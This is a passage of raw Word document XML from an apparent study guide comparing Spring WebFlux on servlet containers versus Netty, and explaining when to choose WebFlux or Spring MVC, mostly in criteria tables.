            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678CCD24" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Reactive backpressure support is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>less effective</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> than in Netty, which is designed for it natively.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6B8793C7" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEF95BE" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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6. Resource Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B50883E" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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More threads are typically required under load, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reducing scalability</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increasing memory consumption</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="28A8855D" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3D30A7" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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7. Deployment Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05805E26" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Deploying in a servlet container may involve more complex setup to ensure </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>non-blocking compliance</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from filters, servlets, or other libraries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6411050B" w14:textId="77777777" w:rsidR="005953AF"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E445041">
          <v:rect id="_x0000_i2343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB630A" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When is it acceptable to use Servlet container with WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761373FC" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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hen you're gradually migrating from Spring MVC to WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63558667" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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hen infrastructure requires running inside a servlet container like Apache Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631200FF" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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hen app load is predictable and low to moderate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD1FD6" w14:textId="77777777" w:rsidR="005953AF"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DC7C772">
          <v:rect id="_x0000_i2344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B2F7B" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED95A3F" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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f you're aiming for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum scalability, non-blocking performance, and full reactive features</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, prefer running Spring WebFlux on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368178D" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Netty (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C4EF1" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Or alternatives like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fully reactive), instead of servlet containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D61C4" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00CE4B95" w:rsidRDefault="005953AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Would you like to see benchmark comparisons or a config example for switching to Netty?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0F0E9"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B1C016D">
          <v:rect id="_x0000_i2345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86E5F2" w14:textId="02B03D50" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="534" w:name="_Toc196308014"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you decide whether to use Spring WebFlux or Spring MVC for your application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p w14:paraId="033BAEBE" w14:textId="16D2A802" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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You should decide between </w:t>
      </w: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Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nature of your application, performance needs, and ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s a detailed comparison to guide the decision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB4E45" w14:textId="77777777" w:rsidR="00585C01"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407B7B5">
          <v:rect id="_x0000_i2346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE67D17" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Use Spring WebFlux if:</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87"/>
        <w:gridCol w:w="7917"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="04B4CFBF" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E59CBE7" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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riteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F009CD" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Why WebFlux?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FC04BAF" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="279296CC"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High Concurrency / I/O Bound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DAFE3BB"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deal for apps with many concurrent requests (e.g. streaming data, chat, APIs calling remote services) where response time is impacted by I/O latency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1DCD3F76" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F244EBE"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eactive Data Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EEDA485"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You're using </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive databases</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. MongoDB with Reactive Streams, R2DBC) or calling </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive APIs</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="40FB4AB9" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66084DBC"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calability is critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679B0427"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WebFlux uses fewer threads (event-loop model) → </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>high scalability with lower resource usage</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0C7E0D00" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036E6D08"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treaming / Real-time Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E598CDF"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Perfect for apps that need </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WebSockets</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, SSE, or </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>live data updates</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7FFD2A1F" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AC55F23"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Backpressure handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DFAD03"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You need </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive backpressure support</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to avoid overloading downstream systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3FA23458" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E45E5E4"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Cloud-native, microservices-first</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A9134C5"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Useful in distributed systems where </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>non-blocking</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> behavior can lead to better resource utilization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CBEF872" w14:textId="77777777" w:rsidR="00585C01"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71F7EEF">
          <v:rect id="_x0000_i2347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E1D81" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Use Spring MVC if:</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17"/>
        <w:gridCol w:w="7787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="507A3417" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CED3E0" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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riteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09A31571" w14:textId="77777777" w:rsidR="00585C01" w:rsidRPr="00B13F85" w:rsidRDefault="00585C01"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Why MVC?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="422E7B8B" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B2D3E5A"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Traditional CRUD App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11BE0765"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MVC is </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>simpler</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for most synchronous use cases (CRUD apps with relational DBs like MySQL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="005E00D1" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C4652C6"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Using JPA / Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00E23027"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JPA is blocking; works </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>better with MVC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> than WebFlux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4EE5D3D8" w14:textId="77777777" w:rsidTr="00585C01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315211B1"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Low-Concurrency Apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
